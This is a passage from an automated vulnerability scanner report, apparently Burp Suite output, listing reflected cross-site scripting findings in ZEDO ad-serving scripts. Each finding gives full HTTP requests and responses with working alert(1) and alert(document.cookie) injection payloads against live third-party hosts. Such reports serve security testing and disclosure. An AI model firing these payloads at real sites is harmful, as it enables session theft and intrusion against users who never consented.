(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&referrerURL=' + encodeURIComponent("http://eztext.com/543f3";alert(1)//6db19040e31") + '&token=' + encodeURIComponent("2d47aca4-2b4b-11e0-abf9-00259009a9e4") + '&partnerId=oversee';
})();(new Image()).src = 'http://ads.adbrite.com/adserver/vdi/806205?r=http%3A//c.chango.com/collecto
...[SNIP]...

4.231. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46055'%3balert(1)//5d9eeeeb662 was submitted in the $ parameter. This input was echoed as 46055';alert(1)//5d9eeeeb662 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=46055'%3balert(1)//5d9eeeeb662&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:46055';alert(1)//5d9eeeeb662;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1934

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat=',46055';alert(1)//5d9eeeeb662';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,46055';alert(1)//5d9eeeeb662;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.232. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dc14"%3balert(1)//8701fee00ba was submitted in the $ parameter. This input was echoed as 7dc14";alert(1)//8701fee00ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=7dc14"%3balert(1)//8701fee00ba&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:7dc14";alert(1)//8701fee00ba;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:17 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',7dc14";alert(1)//8701fee00ba';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,7dc14";alert(1)//8701fee00ba;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.233. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b870"%3balert(1)//b6e0807d8e was submitted in the $ parameter. This input was echoed as 5b870";alert(1)//b6e0807d8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=5b870"%3balert(1)//b6e0807d8e&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:5b870";alert(1)//b6e0807d8e;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1932

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat=',5b870";alert(1)//b6e0807d8e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5b870";alert(1)//b6e0807d8e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=126;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

4.234. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f791'%3balert(1)//4a5a3c4bd88 was submitted in the $ parameter. This input was echoed as 4f791';alert(1)//4a5a3c4bd88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=4f791'%3balert(1)//4a5a3c4bd88&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';alert(1)//4a5a3c4bd88;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:17 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',4f791';alert(1)//4a5a3c4bd88';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,4f791';alert(1)//4a5a3c4bd88;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.235. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18ba8'-alert(1)-'e6b713d7cf8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=18ba8'-alert(1)-'e6b713d7cf8 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=559
Expires: Fri, 28 Jan 2011 16:54:01 GMT
Date: Fri, 28 Jan 2011 16:44:42 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=c=18ba8'-alert(1)-'e6b713d7cf8;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(zz
...[SNIP]...

4.236. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8db9'%3balert(1)//29186ca98e5 was submitted in the l parameter. This input was echoed as f8db9';alert(1)//29186ca98e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/f8db9'%3balert(1)//29186ca98e5&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=39
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:11 GMT
Connection: close
Content-Length: 1903

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
YAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/f8db9';alert(1)//29186ca98e5">
...[SNIP]...

4.237. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71994'%3balert(1)//d11fda3e366 was submitted in the l parameter. This input was echoed as 71994';alert(1)//d11fda3e366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/71994'%3balert(1)//d11fda3e366&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=31
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:19 GMT
Connection: close
Content-Length: 1900

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
DYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/71994';alert(1)//d11fda3e366">
...[SNIP]...

4.238. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8cdf'-alert(1)-'3d2ba540778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?a8cdf'-alert(1)-'3d2ba540778=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
